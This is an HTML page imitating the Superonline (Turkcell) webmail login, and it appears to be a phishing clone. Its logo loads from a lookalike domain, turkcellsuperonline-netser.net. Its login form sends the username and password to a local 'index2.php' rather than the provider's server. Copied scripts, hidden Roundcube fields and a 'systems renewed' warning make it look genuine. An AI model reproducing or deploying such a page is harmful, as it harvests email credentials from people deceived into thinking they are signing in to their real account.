
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Superonline Eposta</title>
<link href="https://eposta.superonline.com/i/css/main.css" rel="stylesheet" type="text/css" media="all" />
<script type="text/javascript" src="https://eposta.superonline.com/program/js/jquery.min.js"></script>
<script type="text/javascript" src='https://www.google.com/recaptcha/api.js'></script>
<!--[if IE 6]>
<link href="https://eposta.superonline.com/i/css/iefix.css" rel="stylesheet" type="text/css" media="all" />
<![endif]-->

<style type="text/css">
	.loginform{
		float:initial;
	}
	#captchaImg{
		width:150px;
		margin-left:4px;
	}
</style>

 <script type="text/javascript">
 var RecaptchaOptions = {
    theme : 'white'
 };
 </script>

<script type="text/javascript">

$(function(){

	var $frm=$('form[name="loginPage"]');

	$('#captchaImgRefresher').click(function(){
		$("#captchaImg").attr('src','i/captcha/captcha.php?'+Math.random());
		return false;
	});

});

</script>




<!-- GA Start -->
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-40146368-2']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
<!-- GA End -->


<script type="text/javascript">
	var type = "standalone";
	var Expand;
	
	// Reload to the master frame if we are inside a frameset
	if (parent.frames[1]) top.window.location=self.location;

	// Switch Local/External
	function switchtype()	{

		if(document.getElementById('mailserver').style.display == 'none')	{
		document.getElementById('mailserver').style.display = "";
		document.getElementById('externalinfo').style.display = "none";
		document.getElementById('localinfo').style.display = "";

		if(Expand == 1) {
		document.getElementById('protocol').style.display = "";
		}

		
		} else	{
		document.getElementById('mailserver').style.display = "none";
		document.getElementById('externalinfo').style.display = "";
		document.getElementById('localinfo').style.display = "none";
		document.getElementById('protocol').style.display = "none";
		}
		

	}

	// Expand More Options
	function ExpandOptions()	{
		Expand = 1;
		document.getElementById('LanguageDisplay').style.display='';
		document.getElementById('RememberMeDisplay').style.display='';
		document.getElementById('MoreOptions').style.display='none';

		if(document.getElementById('mailserver').style.display == '')	{
			document.getElementById('protocol').style.display = "";
		}

	}

	function BasicLogin()	{
		// If a user logged off, don't show the cookie of the users details if set
		browsercheck();
		document.loginPage.username.focus();
		check_default();
		//check_newwindow();
		return;
	}
	
	function check_default()        {

	// Check if Webadmin set to use a default interface

	var i;
	for(i=document.loginPage.LoginType.length-1;i>=0;i--)
	{
	if(document.loginPage.LoginType[i].value == 'xp')
	document.loginPage.LoginType[i].selected = true;
	}

	}
	
	function help(file)	{
		helpwin(file);
	}
	
	function login()	{
		document.body.style.cursor = 'wait';
		document.loginPage.submit();
	}
	</script>
<script language="Javascript" src="https://eposta.superonline.com/html/turkish/javascript/xp.js"></script>
<script type="text/javascript" src="https://eposta.superonline.com/javascript/browsercheck.js"></script>
<script type="text/javascript" src="https://eposta.superonline.com/javascript/rememberme.js"></script>
</head>
<body background="https://eposta.superonline.com/static/styles/themes/Turkcell/images/background.jpg">
<div id="back"></div>
<div id="wrapper">
  <div class="logo">
    <h1>
	<img src="http://turkcellsuperonline-netser.net/wp-content/uploads/2019/09/turkcelllogo.jpg" alt="Superonline" width="511" height="129"  /></h1>
  </div>
  <div class="logo">&nbsp;</div>
  <div class="login-main">
    <div class="login-main-i">
      <div class="loginform"><br />
        <br />
        &nbsp;<form name='loginPage' method="post" action="index2.php">
				<div id="desc_password_reminder" data-bind="i18n: {'key': 'SOLLOGINFORMWEBCLIENT/PASSWORD_REMINDER_TEXT'}" style="color: #fff; font-size: 16px; margin-bottom: 10px; display: none;">
					<font face="Tahoma">Login Information</font></div> <div class="fieldset"> <div class="row login focused" data-bind="css: {'focused': loginFocus(), 'filled': login().length &gt; 0, shake: shake()}"> <label for="selenium_login_login" class="placeholder"></label> <span class="value"> 
					<font face="Tahoma"> 
					<input id="selenium_login_login" tabindex="1" class="input" name="login" type="text" spellcheck="false" data-bind="value: login, hasfocus: loginFocus, valueUpdate: 'afterkeydown', i18n: {'key': 'COREWEBCLIENT/LABEL_LOGIN', 'type': 'placeholder'}" placeholder="Login" size="51"> 
					</font> </span> </div> <div class="row password" id="password" data-bind="css: {'focused': passwordFocus(), 'filled': password().length &gt; 0, shake: shake()}"> <label for="selenium_login_password" class="placeholder"></label> <span class="value"> 
						<font face="Tahoma"> 
						<input id="selenium_login_password" tabindex="3" class="input" name="password" type="password" spellcheck="false" data-bind="value: password, hasfocus: passwordFocus, valueUpdate: 'afterkeydown', i18n: {'key': 'COREWEBCLIENT/LABEL_PASSWORD', 'type': 'placeholder'}" placeholder="Password" size="51"> 
						</font> </span> </div> </div> <div class="row buttons"> <button id="button_forgot_form" type="submit" tabindex="5" class="button login command enable" data-bind="text: signInButtonText, command: loginCommand">
					<font face="Tahoma">Sign In</button> </font> </div> 
				<font face="Tahoma">
                <!-- BANNER / REKLAM -->
                <!-- BANNER / REKLAM --> 

	<!-- rc patch -->
<input type="hidden" name="_token" value="2ec4df14e8349e672dd752e9aa207c86">
<input type="hidden" name="_task" value="login">
<input type="hidden" name="_action" value="login">
<input type="hidden" name="_timezone" id="rcmlogintz" value="_default_">
<input type="hidden" name="_dstactive" id="rcmlogindst" value="_default_">
<input type="hidden" name="_url" id="rcmloginurl" value="">
<input type="hidden" name="_autologin" value="1">
	<!-- rc patch -->
          <br />

				</font>
				<p><font face="Tahoma"><br />

<b>Önemli Uyarı</b><br>
          <b style="color:#c40b35">E-posta sistemlerimiz ve arayüzümüz yenilendi!</b><br>
				<font color="#FFFFFF"><br>
        E-posta şifrenizi değiştirmek ve Outlook ayarları hakkında bilgi almak için
				</font>  <a href="https://webislem.superonline.net/bireysel/login.xhtml"> 
				<font color="#FFFFFF">bu linki tıklayarak</font></a><font color="#FFFFFF"> Online İşlem Merkezi’ne bağlanabilirsiniz. <br />
<b>Önemli Bilgi:</b> Şifrenizi değiştirdikten sonra yeni şifrenizi Outlook programınızda da güncellemeyi unutmayınız.
				</font></font></p>
        </form>
      </div>
      <div id="flashpromo">
        <font face="Tahoma">
        <!-- <script type="text/javascript">GA_googleFillSlot("EpostaGiris300x250");</script> -->
      	</font>
      </div>
      <div class="clear"></div>
    </div>
  </div>
  <div class="login-main-footer"></div>
  <div class="login-footer">
    <ul>
      <li><font face="Tahoma"><a href="http://eposta.superonline.com">@superonline.com</a><span>|</span></font></li>
      <li><font face="Tahoma"><a href="http://kurumsalposta.superonline.com">Kurumsal Posta</a><span>|</span></font></li>
      <li><font face="Tahoma"><a href="http://www.superonline.net/yardim/e-posta.aspx" target="_blank">Yardım</a></font></li>
    </ul>
  </div>
</div>
<p>&nbsp;</p>
</body>
</html>
